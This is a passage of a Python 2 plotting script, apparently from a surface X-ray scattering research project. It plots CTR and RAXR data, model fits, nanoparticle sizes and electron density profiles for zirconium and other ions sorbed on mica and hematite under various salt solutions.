for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
ax.plot([0.35,0.35],[0,10000],':',color='black')
ax.plot([0.87,0.87],[0,10000],':',color='black')
pyplot.xlim((0,5.5))
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_ctrs.png'),dpi=300)
return fig
def plot_CTR_multiple_model_muscovite_matlab_outputs(file_head=module_path_locator(),c_projected=[19.9347,19.9597,19.9167,19.9803],dump_files=[['ctr_data_0mM_NaCl.dat','bestfit_ctr_results_0mM_NaCl.dat'],['ctr_data_1mM_NaCl.dat','bestfit_ctr_results_1mM_NaCl.dat'],['ctr_data_10mM_NaCl.dat','bestfit_ctr_results_10mM_NaCl.dat'],['ctr_data_100mM_NaCl.dat','bestfit_ctr_results_100mM_NaCl.dat']],labels=['0NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],markers=['.']*10,fontsize=13,lw=0.5,color_type=[1,5]):
hfont = {'fontname':['times new roman','Helvetica'][0]}
colors=set_color(len(dump_files)*2,color_type[0])
colors_2=set_color(len(dump_files)*2,color_type[0])
objects=[]
for i in range(len(dump_files)):
objects.append([np.loadtxt(os.path.join(file_head,dump_files[i][0])),np.loadtxt(os.path.join(file_head,dump_files[i][1]))])
fig=pyplot.figure(figsize=(5,4))
ax=fig.add_subplot(1,1,1)
ax.set_yscale('log')
def _find_index_of_near_bragg_peak(q_list=[],l_bragg=[0,2,4,6,8,10,12,14,16],c=19.9347):
index_list=[0]
q_bragg=np.array(l_bragg)*np.pi*2/c
for i in range(len(q_list)):
if i!=len(q_list)-1:
for q in q_bragg:
if q_list[i]<q and q_list[i+1]>q:
index_list.append(i+1)
break
index_list.append(len(q_list))
return index_list
for i in range(len(objects)):
object_data=objects[i][0]
max_q=5.588
print max_q
object_model=objects[i][1]
index_use=np.where(object_model[:,0]<max_q)[0]
object_model=np.append(object_model[index_use,0][:,np.newaxis],object_model[index_use,1][:,np.newaxis],axis=1)
index_list=_find_index_of_near_bragg_peak(object_model[:,0],c=c_projected[i])
ax.scatter(object_data[:,0],object_data[:,1]*(100**i),marker=markers[i],s=10,facecolors='none',edgecolors=colors_2[i],alpha=0.8,label='Data_'+labels[i])
ax.errorbar(object_data[:,0],object_data[:,1]*(100**i),yerr=object_data[:,2]*(100**i),fmt=None,alpha=0.8,ecolor=colors_2[i])
for j in range(len(index_list)-1):
l,=ax.plot(object_model[index_list[j]:index_list[j+1],0],object_model[index_list[j]:index_list[j+1],1]*(100**i),color=colors[i],lw=lw,label='Model_'+labels[i])
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$',axes=ax,fontsize=fontsize,**hfont)
pyplot.ylabel(r'$\rm{Intensity}$',axes=ax,fontsize=fontsize,**hfont)
#pyplot.title('(00L)',weight=4,size=fontsize,clip_on=True)
#ax.legend(prop={'size':fontsize})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
for label in ax.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
ax.plot([0.35,0.35],[0,100],':',color='black')
ax.plot([0.87,0.87],[0,100],':',color='black')
pyplot.xlim((0,6))
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_ctrs.png'),dpi=300)
return fig
def plot_RAXR_matlab_output_single_data_set(file_head='M:\\fwog\\members\\qiu05\\mica\\Zr_files_fit',glob_head='mica_zr_0NaCl_MD_May04_fit',L_list=[0.41,0.53,0.61,0.75,0.88,1.15,1.45,1.71,2.31,2.64,2.85,3.21,3.55,4.24,4.55,5.61,6.25,7.31,9.15,10.31,11.15],c_projected=19.9597,offset=8,start_plot=0,num_plots=21):
#file_head for 0mM NaCl:'M:\\fwog\\members\\qiu05\\mica\\Zr_files_fit',glob_head:'mica_zr_0NaCl_MD_May04_fit'
#file_head for 1mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\1mM_NaCl_Zr_mica', glob_head:'mica_zr_1mM_NaCl_MD_May03_fit'
#file_head for 10mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\10mM_NaCl_Zr_mica', glob_head:'mica_zr_10mM_NaCl_MD_May04_fit'
#file_head for 100mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\100mM_NaCl_Zr_mica', glob_head:'mica_zr_100mM_NaCl_MD_1peak_May04_fit','mica_zr_100mM_NaCl_MD_May04_fit'
hfont = {'fontname':['times new roman','Helvetica'][0]}
files=glob.glob(os.path.join(file_head,glob_head)+'*_norm2')
files_sorted=[]
index_list=[]
for each_file in files:
index_list.append(int(each_file.split('_')[-2]))
for i in range(1,len(files)+1):
for j in range(len(index_list)):
if i==index_list[j]:
files_sorted.append(files[index_list[j]-1])
break
fig=pyplot.figure(figsize=(7,9))
ax=fig.add_subplot(1,1,1)
y_lim_max=170
y_lim_min=0
for i in range(len(files_sorted)):
if i in range(start_plot,num_plots+start_plot):
file=files_sorted[i]
data=np.loadtxt(file)
avg=np.average(data[:,1])
ax.scatter(data[:,0],data[:,1]-avg+i*offset,facecolors='none')
ax.errorbar(data[:,0],data[:,1]-avg+i*offset,yerr=data[:,2],fmt=None)
ax.plot(data[:,0],data[:,3]-avg+i*offset)
ax.annotate('q='+str(round(L_list[i]*np.pi*2/c_projected,3))+' (+'+str(i*offset)+')',xy=(18.13,data[:,3][-1]-avg+i*offset),xytext=(18.13,data[:,3][-1]-avg+i*offset),fontsize=10,**hfont)
y_lim_max=data[:,3][-1]-avg+i*offset+offset
if i==start_plot:
y_lim_min=data[:,3][-1]-avg+i*offset-offset
for label in ax.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
pyplot.xlim((17.9,18.2))
pyplot.ylim((y_lim_min,y_lim_max))
pyplot.xlabel(r'$\rm{Energy(keV)}$',axes=ax,fontsize=13,**hfont)
pyplot.ylabel(r'$\rm{Intensity}$',axes=ax,fontsize=13,**hfont)
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_raxrs.png'),dpi=300)
return fig
def plot_RAXR_matlab_output_multiple_data_sets(file_heads=['M:\\fwog\\members\\qiu05\\mica\\Zr_files_fit','M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\1mM_NaCl_Zr_mica','M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\10mM_NaCl_Zr_mica','M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\100mM_NaCl_Zr_mica'],glob_heads=['mica_zr_0NaCl_MD_May04_fit','mica_zr_1mM_NaCl_MD_May03_fit','mica_zr_10mM_NaCl_MD_May04_fit','mica_zr_100mM_NaCl_MD_May04_fit'],L_list=[0.41,0.53,0.61,0.75,0.88,1.15,1.45,1.71,2.31,2.64,2.85,3.21,3.55,4.24,4.55,5.61,6.25,7.31,9.15,10.31,11.15],c_projected=19.9597,offset=8,start_plot=0,num_plots=3,color_type=1):
#file_head for 0mM NaCl:'M:\\fwog\\members\\qiu05\\mica\\Zr_files_fit',glob_head:'mica_zr_0NaCl_MD_May04_fit'
#file_head for 1mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\1mM_NaCl_Zr_mica', glob_head:'mica_zr_1mM_NaCl_MD_May03_fit'
#file_head for 10mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\10mM_NaCl_Zr_mica', glob_head:'mica_zr_10mM_NaCl_MD_May04_fit'
#file_head for 100mM NaCl:'M:\\fwog\\members\qiu05\\1608 - 13-IDC\\schmidt\\mica\\Zr_files\\100mM_NaCl_Zr_mica', glob_head:'mica_zr_100mM_NaCl_MD_1peak_May04_fit','mica_zr_100mM_NaCl_MD_May04_fit'
hfont = {'fontname':['times new roman','Helvetica'][0]}
colors=set_color(num_plots*2,color_type)
fig=pyplot.figure(figsize=(4,6))
y_lim_max=170
y_lim_min=0
for q_plot in range(num_plots):
ax=fig.add_subplot(num_plots,1,q_plot+1)
for i_plot in range(len(file_heads)):
file_head=file_heads[i_plot]
glob_head=glob_heads[i_plot]
files=glob.glob(os.path.join(file_head,glob_head)+'*_norm2')
files_sorted=[]
index_list=[]
for each_file in files:
index_list.append(int(each_file.split('_')[-2]))
for i in range(1,len(files)+1):
for j in range(len(index_list)):
if i==index_list[j]:
files_sorted.append(files[index_list[j]-1])
break
i=q_plot+start_plot
file=files_sorted[i]
data=np.loadtxt(file)
avg=np.average(data[:,1])
ax.scatter(data[:,0],data[:,1]-avg+i_plot*offset,facecolors='none',edgecolors=colors[i_plot],alpha=0.5)
ax.errorbar(data[:,0],data[:,1]-avg+i_plot*offset,yerr=data[:,2],fmt=None,alpha=0.5,ecolor=colors[i_plot])
ax.plot(data[:,0],data[:,3]-avg+i_plot*offset,color=colors[i_plot])
#ax.annotate('(+'+str(i_plot*offset)+')',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
if i_plot==0:
ax.annotate(r'$\rm{(+0)}$',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
elif i_plot==1:
ax.annotate(r'$\rm{(+8)}$',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
elif i_plot==2:
ax.annotate(r'$\rm{(+16)}$',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
elif i_plot==3:
ax.annotate(r'$\rm{(+24)}$',xy=(18.13,data[:,3][-1]-avg+i_plot*offset),xytext=(18.13,data[:,3][-1]-avg+i_plot*offset),fontsize=10,**hfont)
y_lim_max=data[:,3][-1]-avg+i_plot*offset+offset*1.5
if i_plot==0:
print i,i_plot
y_lim_min=data[:,3][-1]-avg+i_plot*offset-offset
pyplot.xlim((17.9,18.17))
pyplot.ylim((y_lim_min,y_lim_max+9))
q_value=str(round(L_list[q_plot+start_plot]*np.pi*2/c_projected,3))
if q_plot==0:
ax.annotate(r'$\rm{q=0.129\ \AA^{-1}}$',xy=(18.,y_lim_max),xytext=(18.,y_lim_max),fontsize=10,**hfont)
elif q_plot==1:
ax.annotate(r'$\rm{q=0.167\ \AA^{-1}}$',xy=(18.,y_lim_max),xytext=(18.,y_lim_max),fontsize=10,**hfont)
elif q_plot==2:
ax.annotate(r'$\rm{q=0.192\ \AA^{-1}}$',xy=(18.,y_lim_max),xytext=(18.,y_lim_max),fontsize=10,**hfont)
if q_plot==num_plots-1:pyplot.xlabel(r'$\rm{Energy(keV)}$',axes=ax,fontsize=13,**hfont)
pyplot.ylabel(r'$\rm{Intensity}$',axes=ax,fontsize=13,**hfont)
for label in ax.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
#pyplot.title('q='+str(round(L_list[q_plot+start_plot]*np.pi*2/c_projected,3))+r'$\rm{\ \AA^{-1}}$',fontsize=10,**hfont)
#pyplot.rcParams.update({'font.size': 10})
fig.tight_layout()
fig.savefig(os.path.join(file_heads[0],'multiple_raxrs_multiple_data.png'),dpi=300)
return fig
def plotting_modelB(object=[],fig=None,index=[2,3,1],color=['0.35','r','c','m','k'],l_dashes=[()],lw=3,label=['Experimental data','Model fit'],title=['10L'],marker=['o'],legend=True,fontsize=10):
#overlapping the experimental and modeling fit CTR profiles,the data used are exported using GenX,first need to read the data using loadtxt(file,skiprows=3)
#object=[data1,data2,data3],multiple dataset with the first one of experimental data and the others model datasets
ax=fig.add_subplot(index[0],index[1],index[2])
ax.set_yscale('log')
ax.scatter(object[0][:,0],object[0][:,1],marker='o',s=3,facecolors='none',edgecolors=color[0],label=label[0],alpha=0.5)
ax.errorbar(object[0][:,0],object[0][:,1],yerr=object[0][:,2],fmt=None,ecolor=color[0],alpha=0.5)
for i in range(len(object)-1):#first item is experiment data (L, I, err) while the second one is simulated result (L, I_s)
l,=ax.plot(object[i+1][:,0],object[i+1][:,1],color=color[i+1],lw=lw,label=label[i+1])
l.set_dashes(l_dashes[i])
if index[2] in [7,8,9]:
pyplot.xlabel('L(r.l.u)',axes=ax,fontsize=12)
if index[2] in [1,4,7]:
pyplot.ylabel(r'$\rm{|F_{HKL}|}$',axes=ax,fontsize=12)
#settings for demo showing
pyplot.title('('+title[0]+')',position=(0.5,0.82),weight=4,size=10,clip_on=True)
#pyplot.ylim((1,1000))
#settings for publication
#pyplot.title('('+title[0]+')',position=(0.5,1.001),weight=4,size=10,clip_on=True)
"""##add arrows to antidote the misfits
if title[0]=='0 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.25,0.6,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
ax.add_patch(mpt.patches.FancyArrow(0.83,0.5,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
if title[0]=='1 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.68,0.6,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
if title[0]=='3 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.375,0.8,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
"""
if legend==True:
#ax.legend()
ax.legend(bbox_to_anchor=(0.2,1.03,3.,1.202),mode='expand',loc=3,ncol=5,borderaxespad=0.,prop={'size':9})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
#plot normalized data now
if index[0]==2 and index[1]==1:
ax=fig.add_subplot(index[0],index[1],index[2]+1)
ax.set_yscale('log')
ax.scatter(object[0][:,0],object[0][:,3],marker='o',s=20,facecolors='none',edgecolors=color[0],label=label[0])
ax.errorbar(object[0][:,0],object[0][:,3],yerr=object[0][:,4],fmt=None,ecolor=color[0])
for i in range(len(object)-1):#first item is experiment data (L, I, err) while the second one is simulated result (L, I_s)
l,=ax.plot(object[i+1][:,0],object[i+1][:,2],color=color[i+1],lw=lw,label=label[i+1])
l.set_dashes(l_dashes[i])
if index[2] in [7,8,9]:
pyplot.xlabel(r'$\rm{L(r.l.u)}$',axes=ax,fontsize=12)
if index[2] in [1,4,7]:
pyplot.ylabel(r'$|normalized F_{HKL}|$',axes=ax,fontsize=12)
#settings for demo showing
if index[0]==2 and index[1]==1:
pass
else:
if title[0]=='0 0 L':
pyplot.ylim((1,50000))
xtick_labels=ax.get_xticks().tolist()
x_tick_new=[]
for each in xtick_labels:
if each in [1.0,2.0,3.,4.,5.]:
x_tick_new.append(int(each))
else:
x_tick_new.append('')
ax.set_xticklabels(x_tick_new)
#pyplot.xlim((0,20))
elif title[0]=='3 0 L':
pyplot.ylim((1,5000))
elif title[0] in ['2 1 L','2 -1 L']:
pyplot.ylim((1,10000))
else:pyplot.ylim((1,50000))
#pyplot.ylim((1,1000))
#settings for publication
#pyplot.title('('+title[0]+')',position=(0.5,1.001),weight=4,size=10,clip_on=True)
"""##add arrows to antidote the misfits
if title[0]=='0 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.25,0.6,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
ax.add_patch(mpt.patches.FancyArrow(0.83,0.5,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
if title[0]=='1 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.68,0.6,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
if title[0]=='3 0 L':
ax.add_patch(mpt.patches.FancyArrow(0.375,0.8,0,-0.15,width=0.015,head_width=0.045,head_length=0.045,overhang=0,color='k',length_includes_head=True,transform=ax.transAxes))
"""
if legend==True:
#ax.legend()
ax.legend(bbox_to_anchor=(0.2,1.03,3.,1.202),mode='expand',loc=3,ncol=5,borderaxespad=0.,prop={'size':9})
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
#ax.set_ylim([1,10000])
#object files are returned from genx when switch the plot on
def plotting_many_modelB(save_file='D://pic.png',head='P:\\My stuff\\Manuscripts\\hematite rcut\\v10\dump_files\\',object_files=['temp_plot_O1O3_O5O7','temp_plot_O1O3_O5O8','temp_plot_O1O4_O5O7','temp_plot_O1O4_O5O8'],index=[3,3],color=['blue','#e41a1c','#4daf4a','#984ea3','#ff7f00'],lw=1.5,l_dashes=[(None,None),(None,None),(None,None),(None,None),(None,None),(None,None)],label=['Experimental data','Model1 results','Model2 results','Model3','Model4','Model5','Model6'],marker=['p'],title=['0 0 L','0 2 L','1 0 L','1 1 L','2 0 L','2 2 L','3 0 L','2 -1 L','2 1 L'],legend=[False,False,False,False,False,False,False,False,False],fontsize=10):
#plotting model results simultaneously, object_files=[file1,file2,file3] file is the path of a dumped data/model file
#setting for demo show
#fig=pyplot.figure(figsize=(10,9))
#settings for publication
#fig=pyplot.figure(figsize=(10,7))
fig=pyplot.figure(figsize=(8,6))
object_sets=[pickle.load(open(os.path.join(head,file))) for file in object_files]#each_item=[00L,02L,10L,11L,20L,22L,30L,2-1L,21L]
object=[]
for i in range(len(object_sets[0])):
object.append([])
for j in range(len(object_sets)):
if j==0:
object[-1].append(object_sets[j][i][0])
object[-1].append(object_sets[j][i][1])
if len(object_sets[0])==1:#case for plotting muscovite (assuming there is one specular rod)
index=[2,1]
else:#case for plotting hematite (9 rods in total including one specular rod)
index=[3,3]
for i in range(len(object)):
#for i in range(1):
order=i
#print 'abc'
ob=object[i]
plotting_modelB(object=ob,fig=fig,index=[index[0],index[1],i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=legend[order],fontsize=fontsize)
#plotting_modelB(object=ob,fig=fig,index=[1,1,i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=legend[order],fontsize=fontsize)
fig.tight_layout()
fig.savefig(save_file,dpi=300)
return fig
def plotting_many_modelB_2(save_file='D://pic.png',fig_size=(8,6),head='P:\\My stuff\\Manuscripts\\hematite rcut\\pb on cmp rcut v10\dump_files\\',object_files=['temp_plot_O1O3_O5O7','temp_plot_O1O3_O1O4_no_water_Oct12'],index=[3,3],color=['blue','green','red','#984ea3','#ff7f00'],lw=2.,l_dashes=[(None,None),(None,None),(None,None),(None,None),(None,None),(None,None)],label=['Experimental data','Model1 results','Model2 results','Model3','Model4','Model5','Model6'],marker=['p'],title=['0 0 L','0 2 L','1 0 L','1 1 L','2 0 L','2 2 L','3 0 L','2 -1 L','2 1 L'],legend=[False,False,False,False,False,False,False,False,False],fontsize=10):
#plotting model results simultaneously, object_files=[file1,file2,file3] file is the path of a dumped data/model file
fig=pyplot.figure(figsize=fig_size)
object_sets=[pickle.load(open(os.path.join(head,file))) for file in object_files]#each_item=[00L,02L,10L,11L,20L,22L,30L,2-1L,21L]
object=[]
for i in range(len(object_sets[0])):
object.append([])
for j in range(len(object_sets)):
if j==0:
object[-1].append(object_sets[j][i][0])
object[-1].append(object_sets[j][i][1])
if len(object_sets[0])==1:#case for plotting muscovite (assuming there is one specular rod)
index=[2,1]
else:#case for plotting hematite (9 rods in total including one specular rod)
pass
for i in range(len(object)):
if i<index[0]*index[1]:
order=i
ob=object[i]
plotting_modelB(object=ob,fig=fig,index=[index[0],index[1],i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=legend[order],fontsize=fontsize)
else:
pass
fig.tight_layout()
fig.savefig(save_file,dpi=300)
return fig
def plotting_single_rod(save_file='D://pic.png',head='C:\\Users\\jackey\\Google Drive\\useful codes\\plotting\\',object_files=['temp_plot_O1O2','temp_plot_O5O6','temp_plot_O1O3','temp_plot_O5O7','temp_plot_O1O4','temp_plot_O5O8'],index=[1,1],color=['0.6','b','b','g','g','r','r'],lw=1.5,l_dashes=[(2,2,2,2),(None,None),(2,2,2,2),(None,None),(2,2,2,2),(None,None)],label=['Experimental data','Model1 results','Model2 results','Model3','Model4','Model5','Model6'],marker=['p'],title=['0 0 L','0 2 L','1 0 L','1 1 L','2 0 L','2 2 L','3 0 L','2 -1 L','2 1 L'],legend=[False,False,False,False,False,False,False,False,False],fontsize=10,rod_index=0):
#plotting model results simultaneously, object_files=[file1,file2,file3] file is the path of a dumped data/model file
#setting for demo show
#fig=pyplot.figure(figsize=(10,9))
#settings for publication
#fig=pyplot.figure(figsize=(10,7))
fig=pyplot.figure(figsize=(8.5,7))
object_sets=[pickle.load(open(head+file)) for file in object_files]#each_item=[00L,02L,10L,11L,20L,22L,30L,2-1L,21L]
object=[]
for i in range(9):
object.append([])
for j in range(len(object_sets)):
if j==0:
object[-1].append(object_sets[j][i][0])
object[-1].append(object_sets[j][i][1])
for i in [rod_index]:
#for i in range(1):
order=i
#print 'abc'
ob=object[i]
plotting_modelB(object=ob,fig=fig,index=[index[0],index[1],i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=None,fontsize=fontsize)
#plotting_modelB(object=ob,fig=fig,index=[1,1,i+1],color=color,l_dashes=l_dashes,lw=lw,label=label,title=[title[order]],marker=marker,legend=legend[order],fontsize=fontsize)
fig.tight_layout()
fig.savefig(save_file,dpi=300)
return fig
#overplotting experimental datas formated with UAF_CTR_RAXS_2 loader in GenX
def plot_many_experiment_data(data_files=['D:\\Google Drive\\data\\400uM_Sb_hematite_rcut.datnew_formate','D:\\Google Drive\\data\\1000uM_Pb_hematite_rcut.datnew_formate'],labels=['Sb 400uM on hematite','Pb 1000uM on hematite'],HKs=[[0,0],[0,2],[1,0],[1,1],[2,0],[2,1],[2,-1],[2,2],[3,0]],index_subplot=[3,3],colors=['b','g','r','c','m','y','w'],markers=['.','*','o','v','^','<','>'],fontsize=10):
data_container={}
for i in range(len(labels)):
temp_data=np.loadtxt(data_files[i])
sub_set={}
for HK in HKs:
label=str(int(HK[0]))+'_'+str(int(HK[1]))
sub_set[label]=np.array(filter(lambda x:x[1]==HK[0] and x[2]==HK[1],temp_data))
data_container[labels[i]]=sub_set
fig=pyplot.figure()
for i in range(len(HKs)):
title=str(int(HKs[i][0]))+str(int(HKs[i][1]))+'L'
ax=fig.add_subplot(index_subplot[0],index_subplot[1],i+1)
ax.set_yscale('log')
for label in labels:
data_temp=data_container[label][str(int(HKs[i][0]))+'_'+str(int(HKs[i][1]))]
ax.errorbar(data_temp[:,0],data_temp[:,4],data_temp[:,5],label=label,marker=markers[labels.index(label)],ecolor=colors[labels.index(label)],color=colors[labels.index(label)],markerfacecolor=colors[labels.index(label)],linestyle='None',markersize=8)
pyplot.title(title,position=(0.5,0.85),weight='bold',clip_on=True)
for xtick in ax.xaxis.get_major_ticks():
xtick.label.set_fontsize(fontsize)
for ytick in ax.yaxis.get_major_ticks():
ytick.label.set_fontsize(fontsize)
for l in ax.get_xticklines() + ax.get_yticklines():
l.set_markersize(5)
l.set_markeredgewidth(2)
if i==0:
ax.legend(bbox_to_anchor=(0.5,0.92,0,3),bbox_transform=fig.transFigure,loc='lower center',ncol=4,borderaxespad=0.,prop={'size':14})
if (i+1)>index_subplot[1]*(index_subplot[0]-1):
pyplot.xlabel('L',axes=ax,fontsize=fontsize)
if i%index_subplot[1]==0:
pyplot.ylabel('|F|',axes=ax,fontsize=fontsize)
return True
lateral_size=[5.4,5.1,7.3,8.6]
lateral_size_errors=[0.5,0.1,0.6,0.5]
vertical_size=[0.974,1.61,1.6,2.48]
vertical_size_error=[0.01,0.01,0.01,0.04]
labels=['IS=1.8 mM','IS=2.9 mM','IS=12 mM', 'IS=102 mM']
def plot_NP_size_evolution(file_head=module_path_locator(),lateral=lateral_size,lateral_error=lateral_size_errors,vertical=vertical_size,vertical_error=vertical_size_error,label=labels,color_type=1):
colors=set_color(len(lateral),color_type)
hfont = {'fontname':['times new roman','Helvetica'][0]}
fig=pyplot.figure(figsize=(8,5))
ax=fig.add_subplot(1,1,1)
pyplot.ylabel("Vertical size (nm)",fontsize=12)
pyplot.xlabel("Lateral size (nm)",fontsize=12)
for i in range(len(lateral)):
x,y,x_er,y_er,label,color=lateral[i],vertical[i],lateral_error[i],vertical_error[i],labels[i],colors[i]
ax.errorbar(x,y,xerr=x_er,yerr=y_er,fmt='o',label=label,color=color)
#for i in range(len(lateral)-1):
# ax.arrow(lateral[i],vertical[i],lateral[i+1]-lateral[i],vertical[i+1]-vertical[i],head_width=0.05, head_length=0.2, fc='k', ec='k',ls=':',color=colors[i])
ax.annotate(label,xy=(x-0.4,y+0.05),xytext=(x-0.4,y+0.05),fontsize=12)
#ax.legend(fontsize=12,loc=2)
ax.set_ylim(0.8,2.8)
fig.savefig(os.path.join(file_head,'NP_size_evolution.png'),dpi=300)
return fig
def plot_multiple_e_profiles(file_head=module_path_locator(),dump_files=['temp_plot_eden_0NaCl','temp_plot_eden_1NaCl','temp_plot_eden_10NaCl','temp_plot_eden_100NaCl'],label_marks=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],color_type=5):
colors=set_color(len(dump_files),color_type)
fig=pyplot.figure(figsize=(6,8))
ax1=fig.add_subplot(2,1,1)
pyplot.ylabel("E_density",fontsize=12)
#pyplot.xlabel("Z(Angstrom)",fontsize=12)
pyplot.title('Total e profile',fontsize=12)
ax2=fig.add_subplot(2,1,2)
pyplot.ylabel("e density",fontsize=12)
pyplot.xlabel(r"$\rm{Z(\AA)}$",fontsize=12)
pyplot.title('Zr e profile',fontsize=12)
for i in range(len(dump_files)):
data_eden=pickle.load(open(os.path.join(file_head,dump_files[i]),"rb"))
edata,labels=data_eden[0],data_eden[1]
ax1.plot(np.array(edata[-1][0,:]),edata[-1][1,:]+i,color=colors[i],label="Total e "+label_marks[i],lw=2)
ax2.fill_between(np.array(edata[-1][0,:]),edata[-1][2,:]*0+i,edata[-1][2,:]+i,color=colors[i],label="Zr e profile (MD) "+label_marks[i],alpha=0.6)
ax1.legend(fontsize=12)
ax2.legend(fontsize=12)
ax2.set_ylim(0,6)
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_eprofiles.png'),dpi=300)
return fig
dump_files_genx_0=['temp_plot_eden_0NaCl_0502','temp_plot_eden_1NaCl_0502','temp_plot_eden_10NaCl_0502','temp_plot_eden_100NaCl_0502']
labels_genx_0=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl']
dump_files_genx_1=['temp_plot_eden_100mM_NH4Cl_Jul10_2017','temp_plot_eden_100mM_CH5NCl_Jul23_2017','temp_plot_eden_100mM_LiCl_Jul10_2017','temp_plot_eden_100mM_NaCl_Jul10_2017','temp_plot_eden_100mM_KCl_Jul23_2017','temp_plot_eden_100mM_RbCl_Jul10_2017','temp_plot_eden_32mM_MgCl2_Jul10_2017','temp_plot_eden_32mM_CaCl2_Jul10_2017']
labels_genx_1=['100 mM NH4Cl (2.4 Zr/AUC)','100 mM CH5NCl (4.4 Zr/AUC)','100 mM LiCl (2.1 Zr/AUC)','100 mM NaCl (3.7 Zr/AUC)','100 mM KCl (3.9 Zr/AUC)','100 mM RbCl (3.9 Zr/AUC)','32 mM MgCl2 (2.4 Zr/AUC)','32 mM CaCl2 (3.9 Zr/AUC)']
dump_files_genx_2=['temp_plot_eden_100LiCl_Oct4_2017','temp_plot_eden_100NaCl_Oct4_2017','temp_plot_eden_100KCl_Oct4_2017','temp_plot_eden_100RbCl_Oct4_2017','temp_plot_eden_100CsCl_Oct4_2017']
labels_genx_2=[r'100 mM LiCl [5.04(0.01) Zr/AUC]',r'100 mM NaCl [4.57(0.6) Zr/AUC]',r'100 mM KCl [3.92(1) Zr/AUC]',r'100 mM RbCl [2.26(0.15) Zr/AUC]',r'100 mM CsCl [1.58(0.8) Zr/AUC]']
dump_files_genx_3=['temp_plot_eden_100LiCl_Oct5_2017','temp_plot_eden_100NaCl_Oct5_2017','temp_plot_eden_100RbCl_Zr_Oct5_2017','temp_plot_eden_100RbCl_Rb_Oct5_2017','temp_plot_eden_100CsCl_Oct5_2017']
labels_genx_3=[r'100 mM LiCl [4.40(1) Zr/AUC]',r'100 mM NaCl [3.98(0.68) Zr/AUC]',r'100 mM RbCl [2.23(0.04) Zr/AUC]',r'100 mM RbCl [~1.0(0.1) Rb/AUC]',r'100 mM CsCl [1.56(0.04) Zr/AUC]']
